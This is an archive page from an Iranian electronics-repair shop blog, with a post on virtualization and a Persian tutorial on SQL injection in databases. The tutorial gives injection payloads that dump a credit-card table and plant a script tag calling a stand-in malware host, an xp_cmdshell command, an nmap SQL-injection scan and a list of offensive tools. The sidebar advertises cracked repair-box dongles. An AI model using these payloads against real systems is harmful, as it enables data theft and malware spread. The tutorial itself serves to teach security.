• ورود و یا ثبت نام
به فروشگاه ما خوش امدید!  حساب کاربری من
مشهد آی سی
  • صفحه اصلی
  • فروشگاه
    • تخفیف ها
    • داشبورد
    • سبد خرید
    • تسویه حساب
  • نقشه های تعمیراتی
  • وبلاگ
  • درباره ما
    • برنامه موبایل سایت
    • تماس با ما و ثبت شکایت
    • خبرنامه
پیگیری سفارش :
تلفن 09381429697
  • ورود و یا ثبت نام

سبد خرید من -

۰ تومان
0
در سبد خرید 0 محصول وجود دارد
    مجموع : ۰ تومان
    سبد خرید
    تسویه حساب
    • مقایسه
    همه دسته بندی ها
    • هارد پروگرام شده
    • هارد خام
    • نرم افزاری های تعمیراتی
    • فایل های تعمیراتی
    • آی سی (ic)

    سبد خرید من -

    ۰ تومان
    0
    در سبد خرید 0 محصول وجود دارد
      مجموع : ۰ تومان
      سبد خرید
      تسویه حساب
      • مقایسه
      • خانه
      • جستجو بر حسب آرشیو نوامبر 2020

      نوشته‌های تازه

      • آشنایی با تکنولوژی‌های مجازی‌ساز
      • چگونه آسیب‌پذیری‌های درون بانک‌های اطلاعاتی را کشف و ترمیم کنیم؟
      • سرویس وای‌فای ایرانسل چیست؟
      • ویژگی تجمیع لینک در سوییچ‌ها چه قابلیتی ارائه می‌کند؟
      • چگونه ویندوز نصب کنیم؟

      آخرین دیدگاه‌ها

      • tanha66 در حذف frp و ترمیم سریال اسمارت l3953
      • moka در حذف frp و ترمیم سریال اسمارت l3953
      • tanha66 در کرک دانگل zxw
      • علیرضا شهنازی در کرک دانگل zxw
      • tanha66 در کرک دانگل zxw

      بایگانی‌ها

      • نوامبر 2020
      • اکتبر 2020
      • سپتامبر 2020
      • می 2020
      • آوریل 2020
      • مارس 2020
      • فوریه 2019
      • ژانویه 2017

      دسته‌ها

      • آموزش
      • اخبار سایت
      • وبلاگ

      اطلاعات

      • نام‌نویسی
      • ورود
      • خوراک ورودی‌ها
      • خوراک دیدگاه‌ها
      • وردپرس

      دسته‌ها

      • آموزش (۲)
      • اخبار سایت (۴)
      • وبلاگ (۶۰)

      پست های اخیر

      • آشنایی با تکنولوژی‌های مجازی‌ساز
      • چگونه آسیب‌پذیری‌های درون بانک‌های اطلاعاتی را کشف و ترمیم کنیم؟
      • سرویس وای‌فای ایرانسل چیست؟
      • ویژگی تجمیع لینک در سوییچ‌ها چه قابلیتی ارائه می‌کند؟
      • چگونه ویندوز نصب کنیم؟
      • تستر شبکه و سوییچ KVM چه کاری انجام می‌دهد؟

      بهترین پست ها

      کرک دانگل zxw

      کرک دانگل zxw

      ۸,۰۰۰ تومان ۵,۰۰۰ تومان
      نصب آسان باکس ufs3

      نصب آسان باکس ufs3

      ۸,۰۰۰ تومان ۵,۰۰۰ تومان
      کرک باکس EFT

      کرک باکس EFT Dongle Full Crack v1.4.1

      ۹,۰۰۰ تومان ۵,۰۰۰ تومان
      کرک UAT 7.01 بدون باکس

      کرک UAT 7.01 بدون باکس

      ۲۵,۰۰۰ تومان ۱۰,۰۰۰ تومان

      آرشیو ماهانه: آبان ۱۳۹۹

      1604471544

      آشنایی با تکنولوژی‌های مجازی‌ساز

      نوشته شده توسط: مشهد آی سی ۱۴ آبان ۱۳۹۹ 0دیدگاه
      مجازی سازی یکی از راه هایی است که می تواند در کاهش هزینه ها کمک شایان نماید. از سوی دیگر با استفاده از تکنولوژی های مجازی ساز می توان قابلیت های یک سیستم را ارتقا داد و باعث شد تا امنیت در آن افزایش یابد. سیستم های مجازی ساز متعدد هستند که یکی از کاربردهای آن در مجازی سازی سرورها کاربرد دارد.

       در مجازی سازی لازم است تا با استفاده از نرم افزارهایی منابع را میان سرورهای مجازی مختلف تقسیم کرد. همین تقسیم منابع باعث می شود تا هزینه ها کاهش یابد. از جمله نرم افزارهای مجازی ساز می توان به ESXi، مایکروسافت Hyper Vو VMware vSphere اشاره نمود. در تمام این نرم افزارها تامین امنیت از جمله مشخصه های بسیار مهم به شمار می رود. در تصویر زیر مقایسه ای میان سرور فیزیکی و سرور مجازی مشخص شده است و این موضوع به تکنولوژی به کار رفته در آن ها بستگی دارد.

      تکنولوژی های مجازی ساز, مقایسه سرور مجازی و فیزیکی

      در مجازی سازی برای ایجاد یک سیستم واحد، سیستم عامل ها به صورت موازی بر یک سی پی یو به طور همزمان عمل می کنند. این موضوع نیز نوعی کاهش هزینه است. این مزیت همواره در همه ابعاد مجازی سازی دیده می شود. البته این کاهش هزینه در همه ابعاد چه فنی و چه در مصارف دیگر مانند مصرف برق و غیره نیز وجود دارد. اگر مجازی سازی گسترده تر شود نیاز است تا سخت افزارهای متعدد در کنار هم یک شبکه واحد را ایجاد می نمایند و خروجی می گیرند.

      انواع مجازی سازی در قالب فنی را می توان به سه بخش عمده تقسیم بندی کرد. مجازی سازی کامل، مجازی سازی ناقص و مجازی سازی تقلیدی این سه بخش را تشکیل می دهند. در مجازی سازی کامل بر روی یک سرور چند سیستم عامل به طور همزمان قابل اجرا هستند. همین موضوع در مجازی سازی تقلیدی اتفاق می افتد اما در مجازی سازی ناقص تقریبا اختصاصی شدن سیستم به صورت منفرد اتفاق می افتد.

      اما بر اساس کاربرد می توان گفت که مجازی سازی می تواند بر مبنای شبکه ، بر روی سرور و بر فضای ذخیره سازی ایجاد گردد. با توجه به این که سرورها منابع قدرتمندی هستند که با اتصال به آنها دسترسی به امکانات مختلفی محقق می شود، لذا مجازی سازی بر روی سرور یکی از ابعاد مهم این روش به شمار می رود.

      همانطور که در بالا اشاره شد نیاز است تا نرم افزارهایی برای مجازی سازی به کار رود. برخی دیگر از نرم افزارهایی که در این زمینه کاربرد دارند عبارتند از:

      Citrix XenServer –  Linux KVM –  Oracle VM Server – Virtuozzo  –  Proxmox VE  –  Red Hat Virtualization – VirtualBox –  Parallels – QEMU – bhyve

      با استفاده از مجازی سازی راحت تر می توان جزئیات یک سرور را مدیریت نمود.

      image bfbb6293670ea7f76e6aa3aee21172456a78d149

      ایده اصلی مجازی سازی چگونه شکل گرفت؟

      شاید بتوان گفت که عدم انطباق سخت افزارها با نرم افزارهای نصب شده باعث شد تا مجازی سازی این عدم انطباق را تا حد ممکن کاهش دهد. البته با استفاده از این روش ها می توان سخت افزارها را نیز بهینه سازی کرد. پس ایده مجازی سازی دارای ابعاد مختلفی است. استفاده از سخت افزار سیستم دیگر باعث می شود تا فرد بتواند به این واسطه قدرت بهره مندی از انواع سخت افزار را افزایش دهد. این موضوع در مجازی سازی اتفاق می افتد. مثالی در این زمینه مطرح می شود که می تواند به فهم موضوع و ایده ایجاد فناوری مجازی سازی کمک شایان نماید. فرض کنید مشخصات فنی کامپیوتر فرد به گونه ای نباشد که نرم افزاری خاص بر روی آن نصب نشود. زیرا مشخصات فنی مورد نیاز برای نصب بالاتر از مشخصات فنی کامپیوتر باشد. در این حالت با استفاده از مجازی سازی می توان این نرم افزار را نصب کرد و اقدامات مورد نیاز جهت بهره برداری از آن را انجام داد. مجازی سازی با استفاده از امکانات سرور قدرتمند این پوشش را فراهم می آورد.

      تاریخچه مجازی سازی

      شاید بتوان گفت که دهه ۹۰ میلادی آغاز ایجاد تفکر مجازی سازی بوده است. با گسترده شدن استفاده از تکنولوژی های مجازی ساز بسیاری از شرکتها تمایل خود را به استفاده از این روشها اعلام نموده و در انتهای دهه ۹۰ میلادی استفاده از این روش گستردگی یافت. در این میان بسیاری از شرکتها اعلام داشتند که تقریبا ۸۰ درصد هزینه های شرکت کاهش یافته اند. از سوی دیگر توان آزمایش های مجدد انواع اپلیکیشن ها نیز با استفاده از مجازی سازی امکان پذیر شد زیرا تکرار آزمایش ها هزینه بر می باشد و مجازی سازی این تکرارها را میسر ساخت. زمانی که هزینه ها کاهش یابد و بتوان انواع آزمایش ها را بر روی اپلیکیشن ها انجام داد و کار شرکت را بررسی مجدد نمود، یعنی بازدهی کار نیز افزایش می یابد. این اتفاقات زمانی حاصل شد که مجازی سازی به عنوان ابزاری قدرتمند از همان دهه ۹۰ برای شرکتها معرفی و شناخته شد. شاید پایه و شروع مجازی سازی از IT آغاز شد اما در طول زمان این موضوع به ابعاد گسترده تری وسعت یافت.

      چند مثال برای آشنایی بیشتر

      ساده ترین مثالی که برای مجازی سازی می توان بیان نمود همان نصب یک سیستم عامل بر روی سیستم عامل نصب شده اول است. یعنی بخشی از فضای سخت افزار به سیستم عامل دوم اختصاص داده شده است. هر دو سیستم عامل به طور همزمان قابلیت اجرا داشته و با تغییر سیستم عامل اهداف برنامه ریزی شده نیز اجرا می شوند.

      مثالی دیگر در این زمینه می تواند به نصب یک نرم افزار بر روی یک سیستم عامل و عدم نصب بر روی سیستم عامل دیگر باشد. یعنی زمانی که نمی توان بر روی یک سیستم عامل با مشخصات فنی مشخص نرم افزاری را نصب کرد، با مجازی سازی این امکان بر روی سیستم عامل دیگر انجام می شود.

      در پایان اشاره می نماییم که برای مجازی سازی می توان از مجازی سازی سرور، مجازی سازی دسکتاپ، مجازی سازی نرم افزار، مجازی سازی ورودی و خروجی، مجازی سازی شبکه، مجازی سازی دیتا و موارد دیگر استفاده کرد. نحوه استفاده از این روشها مشابه مواردی است که در بالا به آنها اشاره شده است.

      از کجا، یک سرور مجازی سازی شده خریداری کنیم؟

      یکی از سوالاتی که ممکن است برای شما به وجود آید این می باشد که از کجا می توانید یک سرور مجازی یا یک سروری که مطابق با استاندارد های مجازی سازی و با ابزار های مجازی ساز که بالاتر اشاره کردیم ساخته شده باشد تهیه کنید؛ ایران سرور ، یکی از شرکت هایی می باشد که می توانید با خرید VPS و سرور های مجازی سازی شده، وب سایتتان را روی آن آپلود کنید و به کاربرانتان نمایش دهید.

      بیشتر بخوانید
      1603604243

      چگونه آسیب‌پذیری‌های درون بانک‌های اطلاعاتی را کشف و ترمیم کنیم؟

      نوشته شده توسط: مشهد آی سی ۱۱ آبان ۱۳۹۹ 0دیدگاه
      بانک‌های اطلاعاتی قلپ تپنده معاملات تجاری (B2B2، B2C و….) در مقیاس کلان و خرد هستند و به سازمان‌ها اجازه می‌دهند به شکل صحیحی با مشتریان در تعامل باشند. در حالت کلی، بانک‌های اطلاعاتی داده‌های مشتریان، شماره کارت‌های اعتباری، گذرواژه‌ها و سایر داده‌های مهم و کلیدی را ذخیره می‌کنند. آن‌ها در طول روز به دفعات مورد استفاده قرار می‌گیرند و هدف بالقوه و مهمی به شمار می‌روند.

      تنها در یک نمونه کوچک آلبرت گونزالز در خلال سال‌های ۲۰۰۵ تا ۲۰۰۷ بر مبنای تکنیک حمله تزریق کد اس‌کیو‌ال اطلاعات حدود ۱۷۰ میلیون کارت اعتباری را از بانک‌های اطلاعاتی مختلف استخراج کرد. اگر بلیط هواپیما رزرو کرده‌اید، به رستورانی رفته‌اید و هزینه مربوطه را با کارت اعتباری خود پرداخت کرده‌اید یا هرگونه خرید اینترنتی انجام داده‌اید، در تمامی این موارد از یک بانک اطلاعاتی استفاده کرده‌اید که اطلاعات شخصی را در قالب رکوردهایی ذخیره و آماده دسترسی کرده است.


      برخی مواقع، هکرها به جای حمله مستقیم به بانک‌های اطلاعاتی به رابط‌های برنامه‌نویسی حمله می‌کنند که برای تعامل با بانک‌های اطلاعاتی استفاده می‌شوند. به‌طور مثال، ADO سرنامActiveX Data Objects  یک واسط برنامه‌نویسی است که به کاربران امکان ویرایش داده‌های ذخیره شده در بانک‌های اطلاعاتی را می‌دهد. همچنین معماری سرویس‌گرا (SOA) سرنام service-oriented architecture نیز وجود دارد که مجموعه‌ خدمات کاربردی را ارائه می‌کند. این سرویس‌ها با هدف متصل کردن داده‌ها به یکدیگر استفاده می‌شوند. بخش عمده‌ای از سرویس‌های وب به شکلی پیاده‌سازی می‌شوند تا دسترسی کاربران به آن‌ها از طریق پورتال‌های فرانت‌اند فراهم باشد. اجازه دهید قبل از آن‌که به سراغ حملات رایجی برویم که پایگاه‌های داده را هدف قرار می‌دهند به چند واقعیت مهم در ارتباط با بانک‌های اطلاعاتی اشاره‌ای داشته باشیم. بسته به سیستم مدیریت بانک اطلاعاتی (DBMS) که پیاده‌سازی شده، پایگاه‌های داده‌ می‌توانند متمرکز یا توزیعی باشند. از مهم‌ترین سامانه‌های مدیریت بانک‌های اطلاعاتی به موارد زیر می‌توان اشاره کرد:

      سیستم مدیریت پایگاه داده سلسله مراتبی (Hierarchical database management system): در این نوع پایگاه داده، پیوندها در یک ساختار درختی مرتب می‌شوند. هر رکورد می‌تواند تنها یک مالک داشته باشد و به همین دلیل در اغلب موارد یک پایگاه داده سلسله مراتبی را نمی‌توان برای ارتباط با ساختارهای موجود در دنیای واقعی استفاده کرد.

      سیستم مدیریت پایگاه داده شبکه‌ای (Network database management system): این نوع بانک اطلاعاتی انعطاف‌پذیرتر از پایگاه داده سلسله مراتبی است. مدل بانک اطلاعاتی شبکه‌ای مبتنی بر یک ساختار شبکه‌ای است. در یک چنین پایگاه داده‌ای هر رکورد می‌تواند چند والد و رکورد فرزند داشته باشد.

      سیستم مدیریت پایگاه داده رابطه‌ای (Relational database management system): این نوع بانک اطلاعاتی معمولاً مجموعه‌ای از جداول است که توسط کلیدهای اصلی و خارجی به یکدیگر مرتبط می‌شوند. بیشتر سازمان‌ها از نرم‌افزارهایی استفاده می‌کنند که بر مبنای بانک‌های اطلاعاتی رابطه‌ای طراحی شده‌اند. اکثر بانک‌های اطلاعاتی رابطه‌ای از SQL به عنوان زبان پرس‌و‌جو استفاده می‌کنند. دانشجویان رشته مهندسی نرم‌افزار به خوبی با این مدل بانک‌های اطلاعاتی آشنایی دارند، زیرا سرفصل‌های دروس بانک‌های اطلاعاتی دانشگاهی بر مبنای تعریف و مدیریت یک چنین بانک‌های اطلاعاتی تدوین شده‌اند.

      سیستم مدیریت پایگاه داده شی‌گرایی (Object-oriented database management system): این نوع بانک اطلاعاتی نسبتاً جدید است و برای غلبه بر برخی محدودیت‌های پایگاه‌های داده‌ای رابطه‌ای که توسط سازمان‌های بزرگ استفاده می‌شوند طراحی شده است. پایگاه‌های داده شی‌گرا از زبانی سطح بالا مانند SQL استفاده نمی‌کنند. این پایگاه‌های داده‌ بر مبنای معماری مدل‌سازی و ساخت داده‌ها به عنوان اشیا پشتیبانی می‌کنند.

      شناسایی سرورهای SQL

      امروزه در بیشتر دوره‌های آموزشی و مدارک بین‌المللی تمرکز بر بانک ‌اطلاعاتی Microsoft SQL است، اما آسیب‌پذیری‌ها در بانک‌های اطلاعاتی مختلف وجود دارد. جدول یک رایج‌ترین برنامه‌های پایگاه داده که به شکل گسترده توسط توسعه‌دهندگان و سازمان‌ها استفاده می‌شوند را نشان می‌دهد.

      پورتبانک اطلاعاتی
      ۱۵۲۱

      Oracle Net Listener

      ۱۴۳۴

      Microsoft SQL

      ۳۳۰۶

      MySQL

      پس از شناسایی یک پایگاه داده، مهاجم در اولین گام به سراغ یک فیلد نام حساب کاربری می‌رود تا آسیب‌پذیری‌های SQL را شناسایی کند. این مرحله گاهی اوقات علامت (tick) نامیده می‌شود. هکر با انجام محاوره‌ای نتیجه بازگشتی را بررسی می‌کند. به‌طور مثال، نتیجه برگشتی ممکن است چیزی شبیه به حالت زیر باشد:

      Microsoft OLE DB Provider for SQL Server error ‘80040e14’

      Unclosed quotation mark before the character string ‘ and Password=”.

      /login.asp, line 42

      هکر با مشاهده این پیغام و یک جست‌وجوی ساده متوجه می‌شود بانک‌اطلاعاتی مستعد حمله تزریق کد SQL است. در این مرحله هکر به سراغ اسکریپت‌های نرم‌افزار Nmap می‌رود. Nmap یکی از پر کاربردترین نرم‌افزارهای دنیای فناوری است که متخصصان دنیای شبکه و امنیت به شکل گسترده‌ای از آن استفاده می‌کنند. به‌طور مثال، اسکریپت زیر به سراغ فرم‌های موجود در وب‌سایت‌ها می‌رود و سعی می‌کند هر فیلد آسیب‌پذیری را شناسایی کند.

      nmap -sV –script=http-sql-injection <target>

      تزریق کد اس‌کیو‌ال زمانی اتفاق می‌افتد که مهاجم از آسیب‌پذیری‌های مستتر در بانک ‌اطلاعاتی برای وارد کردن دستورات SQL در  یک محاوره استفاده می‌کند و محاوره با موفقیت روی بانک‌اطلاعاتی اجرا می‌شود. تزریق کد SQL به مهاجم امکان می‌دهد از مزایای اجرای کدهای غیرایمن و مخرب روی یک سیستم به بهترین شکل استفاده کند و دستورات مدنظر خود را به شکل مستقیم به یک پایگاه داده انتقال دهد. در این حالت مهاجم قادر است از دسترسی خود برای انجام فعالیت‌های مختلف استفاده کند. سرورهای آسیب‌پذیر می‌توانند در برابر تزریق SQL از انجام فعالیت‌های عادی خود بازایستاده، از دسترس خارج شوند یا در سناریوهای بدتر، دستوراتی روی آن‌ها اجرا شود تا اطلاعات پایگاه داده استخراج شود. در موارد پیچیده‌تر هکرها ممکن است به جای استخراج یا از دست خارج کردن سرورها، به سراغ تحریف اطلاعات بروند و رکوردهای اطلاعاتی غیرواقعی را به جداول اضافه کنند. هکرها در چهار مرحله زیر به بانک‌های اطلاعاتی آسیب‌پذیر حمله می‌کنند:

      • ردیابی: هکرها از فناوری‌هایی برای شناسایی بانک‌های اطلاعاتی و پروتکل‌های استفاده شده توسط وب‌سایت‌ها استفاده می‌کنند.
      • شناسایی: نقاط ورودی مربوط به کاربر شناسایی می‌شود. این نقاط ورودی بیشتر فیلدهایی دریافت اطلاعات ورودی از کاربر هستند.
      • آزمایش: فیلدهای ورودی کاربر که مستعد حمله هستند شناسایی می‌شوند.
      • بهره‌برداری: بیت‌های اضافی یا به عبارت دقیق‌تر، دستورات مخرب در فیلدهای ورودی قرار می‌گیرند تا دستورات اجرایی روی سامانه قربانی اجرا شوند.

      سرپرستان بانک‌های اطلاعاتی برای آن‌که مطمئن شوند بانک‌های اطلاعاتی در برابر حملات تزریق کد اس‌کیو‌ال آسیب‌پذیر هستند یا خیر، باید به شکل دستی یا خودکار آن‌ها را آزمایش کنند. آزمایش به شیوه دستی به دانش فنی و تجربه زیاد نیاز دارد. روش دوم به‌کارگیری ابزارهای کشف آسیب‌پذیری‌ها است که از آن جمله می‌توان به اسکریپت‌های Nmap اشاره کرد.

      آسیب‌پذیری‌های تزریق SQL

      تزریق کد مخرب SQL یکی از شایع‌ترین بردارهای حمله است. تزریق یک علامت نقل قول همراه با کاراکترهای الفبا که منجر به خطایی در بانک اطلاعاتی یکی از مهم‌ترین تکنیک‌های مورد استفاده هکرها است. یک چنین حمله‌ای روی هر یک از فیلدهای ورودی قابل اجرا است. از مهم‌ترین تکنیک‌های تزریق کد مخرب اس‌کیو‌ال به موارد زیر می‌توان اشاره کرد:

      تزریق ساده SQL: از فقدان مکانیزم‌های اعتبارسنجی ورودی‌ها برای حمله استفاده می‌شود.

      تزریق کد مبتنی بر فرمان Union: در این تکنیک از فرمان UNION SELECT استفاده می‌شود. در این حمله سعی می‌شود از عملگر UNION  برای ترکیب نتایج دو یا چند فرمان SELECT در قالب یک نتیجه واحد استفاده شود. این تکنیک حمله عمدتا برای سرقت اطلاعات استفاده می‌شود.

      تزریق کد مبتنی بر خطا: در تکنیک فوق به عمد از عبارات ساختاری ضعیف استفاده می‌شود تا بانک اطلاعاتی مجبور شود برای پاسخ‌گویی نام جدول و اطلاعات دیگر پیغام‌های خطا را نشان دهد.

      تزریق کد غیر خوانا: این بردار حمله به‌نام تزریق کد استنتاجی نیز نامیده می‌شود. زمانی‌که مهاجمی می‌داند پایگاه داده مستعد تزریق کد مخرب است، اما طراحان بانک اطلاعاتی پیام‌های خطا یا بازخوردها را پنهان کرده‌اند و کدهای خطا یا بازخوردی دریافت نمی‌شود از این بردار حمله استفاده می‌کند. تکنیک فوق زمان‌بر است، با این حال، مهاجم سعی می‌کند حمله را با وارد کردن مجموعه‌ای از درخواست‌ها آزمایش کند. هکر با اجرای این حمله هیچ‌گونه اطلاعات خاصی دریافت نمی‌کند، بلکه جواب‌ها را تنها در حالت صحیح یا اشتباه دریافت می‌کند.

      سرورهای SQL به دلیل کدنویسی ضعیف، عدم اعتبارسنجی ورودی‌ها و عدم به‌روزرسانی و نصب وصله‌ها آسیب‌پذیر هستند، به همین دلیل سرپرستان بانک‌اطلاعاتی یا دپارتمان امنیت باید به عنوان بخشی از برنامه تست نفوذسنجی، وب‌سایت‌ها یا برنامه‌های وب‌محور را برای این مدل آسیب‌پذیری‌ها آزمایش کنند. از مهم‌ترین آسیب‌پذیری‌های پیرامون بانک‌های اطلاعاتی به موارد زیر می‌توان اشاره کرد:

      • عدم به‌کارگیری فرآیند پاک‌سازی یا فیلتر داده‌های ورودی کاربر (sanitization)
      • ترکیب ساختارهای کنترلی و داده‌ای در کانال انتقال یکسان

      برای درک بهتر حملات تزریق کد SQL باید شکل اصلی دستور SELECT را بررسی کنیم. دستور SELECT برای دریافت رکوردهای ذخیره شده در جداول بانک اطلاعاتی استفاده می‌شود. ترکیب نحوی به این شکل است که ابتدا کلیدواژه SELECT در ابتدای محاوره نوشته می‌شود و در ادامه بسته به اطلاعاتی که قرار است دریافت شوند، فیلدهای اطلاعاتی به همراه جداول تعیین می‌شوند. ساده‌ترین شکل به‌کارگیری فرمان فوق به شرح زیر است:

      SELECT * FROM Orders

      معنای کلی فرمان فوق این است که “من دوست دارم سرور SQL تمام سوابق موجود در جدولی به‌نام Orders را به من نشان دهد.” اکنون اجازه دهید کمی روی این دستور کار کرده و آن‌را دقیق‌تر کنیم:

      SELECT OrderID, FirstName, LastName FROM Orders

      این دستور محتوای درون ستون‌های OrderID ، FirstName و LastName جدول Orders را بازیابی و نتایج را نشان می‌دهد. زمانی‌که سعی کنید گزینه‌ها و فرمان‌های دیگری شبیه به WHERE (تنظیم یک جمله شرطی)، LIKE (تعیین شرطی که محتوایی شبیه به مقدار متغیر را بر می‌گرداند)، AND و OR (خود توضیحی) را به فرمان اصلی وارد کنید، اطلاعات به شکل دقیق‌تری بازگردانده می‌شوند:

      SELECT OrderID, FirstName, LastName FROM Orders WHERE LastName =’Smith’

      ساده‌ترین راه شناسایی آسیب‌پذیری تزریق SQL در یک بانک‌اطلاعاتی، اضافه کردن کاراکترهای غیر معتبر به یک مقدار پارامتری و تماشای خطاهای برنامه در پاسخ به محاوره است. کارشناسان امنیتی عمدتا از این روش برای تشخیص آسیب‌پذیری‌های یک بانک‌اطلاعاتی استفاده می‌کنند. رویکرد مبتنی بر ترکیب نحوی عملکرد مثبتی دارد، البته به شرطی که پیام‌های خطا نشان داده شوند و طراح از مکانیزم پنهان‌سازی پیام‌ها استفاده نکرده باشد. در صورت عدم نمایش پیام‌ها باید از تکنیک تزریق کد استنتاجی استفاده کرد. صرف‌نظر از تکنیک مورد استفاده باید کاراکتری را پیدا و در محاوره قرار داد تا پس از اجرا توسط بانک‌اطلاعاتی خطایی تولید کند و این خطا در قالب پاسخ از سرور دریافت شود. تنها در این صورت قادر به شناسایی و ترمیم آسیب‌پذیری تزریق کد هستید. در یک حمله تزریق کد ساده SQL، مهاجم ممکن است سعی کند رکوردهای موجود در بانک اطلاعاتی را تغییر داده یا رکوردهای جدیدی را اضافه کند. هکرها از روش‌های زیر برای اضافه، به‌روزرسانی یا کشف نام یک جدول استفاده می‌کنند:

      SELECT FirstName, LastName FROM Salesperson WHERE State = ”;

      INSERT INTO TABLE Users (‘username’) VALUES (‘mike’); –‘

      یا

      SELECT FirstName, LastName FROM Salesperson WHERE State = ”;

      UPDATE TABLE Users SET Salary=1500000 WHERE username=’mike’; –‘

      یک روش ساده برای شناسایی نام یک جدول

      blah’ AND 1+(SELECT COUNT(*) FROM mytable); —

      در نگاه اول ممکن است دستورات فوق چندان خطرناک نباشد، اما به قطعه کد زیر دقت کنید که چگونه یک هکر با تزریق کد اقدام به سرقت رکوردهای داده‌ای می‌کند:

      SELECT FirstName, LastName FROM Salesperson WHERE State = ”;

      SELECT * FROM TABLE CreditCards; –‘

      در موراد بحرانی‌تر، حمله ممکن است سرور SQL را مجبور به گسترش بدافزارها کند:

      SELECT FirstName, LastName FROM Salesperson WHERE State = ”;

      UPDATE TABLE Users SET MiddleName =

      ‘<script src=”http://malware_site.ru/malware.js“/>’; –‘

      در مثال بالا مهاجم از سرور SQL برای پخش بدافزار استفاده می‌کند. در این حالت، هنگامی که قربانی صفحه آلوده را مشاهده می‌کند، برنامه برچسب اسکریپت مخرب را از فایل بانک‌اطلاعاتی استخراج کرده و آن‌را به محتوای صفحه اضافه می‌کند. در ادامه مرورگر قربانی بدافزار را بازیابی و اجرا می‌کند و بارداده مخرب به سادگی روی سامانه او نصب می‌شود، بدون آن‌که قربانی کار خطرناکی انجام داده باشد. سرانجام، مهاجم ممکن است از طریق سرور SQL با سیستم‌عامل ارتباط برقرار کرده و به محیط شبکه دسترسی پیدا کند. هکرها عمدتا از دو تکنیک رایج برای این منظور استفاده می‌کنند که خواندن و نوشتن فایل‌های سیستمی از دیسک و اجرای مستقیم دستورات است. دستور زیر نمونه‌ای از این مدل دستورات است.

      exec master..xp_cmdshell ‘ping 192.168.123.254

      راهکار مقابله با حملات تزریق کد چیست؟

      بهترین راهکار مقابله با این مدل حملات، کد‌نویسی قوی، وصله‌ کردن آسیب‌پذیری‌های سیستمی و به‌کارگیری مکانیزم‌های احراز هویت قوی است. به عنوان سرپرست بانک‌اطلاعاتی باید اطمینان حاصل کنید تنها مجوزهای موردنیاز به کارمندان تخصیص داده شده و در زمان کدنویسی برنامه‌های کاربردی از مکانیزم‌های مدیریت خطا استفاده شده تا هر زمان سیستم خطایی را تشخیص داد، هیچ اطلاعات قابل استفاده‌ای در اختیار هکرها قرار نگیرد.

      ابزارهای در دسترس برای شناسایی و به‌کارگیری آسیب‌پذیری‌ها

      ابزارهای امنیتی کاربرد دوگانه دارند، زیرا هکرها و کارشناسان امنیتی به یک شکل از آن‌ها استفاده می‌کنند. از مهم‌ترین ابزارهای در دسترس در این زمینه به موارد زیر می‌توان اشاره کرد:

      •  SQLDict: ابزار فوق برای پیاده‌سازی یک حمله لغت‌نامه‌ای روی سرور SQL استفاده می‌شود تا کارشناسان امنیتی بتوانند ضعف‌های موجود را شناسایی کنند.
      •  SQLExec: دستوراتی که باعث می‌شوند مشکلات جدی یک سرور SQL نمایان شوند را اجرا می‌کند.
      •  SQLbf: بر مبنای حملات جست‌وجوی فراگیر و لغت‌نامه سعی می‌کند گذرواژه‌های ضعیف استفاده شده را نشان دهد.
      •  BSQL Hacker: یک ابزار تزریق خودکار SQL است.
      •  SQL2.exe: برای پیاده‌سازی یک حمله سرریزبافر UDP یک پنجره خط فرمان در اختیار هکر قرار می‌دهد.
      •  Marathon Tool: برای پیاده‌سازی حملات تزریق کد استنتاجی استفاده می‌شود.
      •  SQL Power Injector: برای بهره‌برداری از تزریق کد اس‌کیو‌ال استفاده می‌کند.
      •  Havij: برای جمع‌آوری نشانه‌های اولیه در ارتباط با بانک‌اطلاعاتی استفاده می‌شود و سعی می‌کند مواردی همچون گذرواژه‌ها، نام‌های لاگین DBMS و جداول dump را بازیابی کرده، به واکشی داده‌ها پرداخته، دستورات SQL را اجرا کرده و دسترسی به فایل‌های سیستمی را سرورهای SQL را فراهم کند.
      •  Absinthe: ابزار دیگری است که برای بهره‌برداری از اکسپلویت‌های SQL استفاده می‌شود.
      بیشتر بخوانید
      logo 4 e1548532700450
      • مشهد بلوار مدرس (چهار طبقه) نبش مدرس 8 مجتمع تجاری مدرس طبقه مثبت یک پلاک 23 هزاره سوم رجب زاده- ابوالقاسم (قاسم)رجب زاده
      • 09381429697-05132220084
      • ساعت کاری : 9:00 صبح - 8:00 بعد از ظهر

      حساب کاربری مشتری

      • حساب کاربری من
      • تماس با ما
      • درباره ما
      • پرسش و پاسخ

      اطلاعات

      • قوانین ارسال
      • حفظ حریم خصوصی مشتری
      • محل فروشگاه
      • بازاریابی

      دسته بندی ها

      • نقشه سرویس (RSS)
      • پشتیبانی محصولات
      • خدمات ما
      • نظرات شما

      نمادها

      ©2019 کلیه حقوق برای مشهد آی سی محفوظ است ...
      faic 1
      بستن
      ورود یا ثبت نام
      رمز عبور را فراموش کرده اید؟

      تازه وارد هستید؟

      ثبت نام سریع و آسان!

      • پرداخت سریع
      • ذخیره چندین آدرس پستی
      • نمایش و پیگیری سفارشات و ...
      یک حساب کاربری بسازید
      x
      X
      • منو
      • دسته بندی ها
      • صفحه اصلی
      • فروشگاه
        • تخفیف ها
        • داشبورد
        • سبد خرید
        • تسویه حساب
      • نقشه های تعمیراتی
      • وبلاگ
      • درباره ما
        • برنامه موبایل سایت
        • تماس با ما و ثبت شکایت
        • خبرنامه
      • هارد پروگرام شده
      • هارد خام
      • نرم افزاری های تعمیراتی
      • فایل های تعمیراتی
      • آی سی (ic)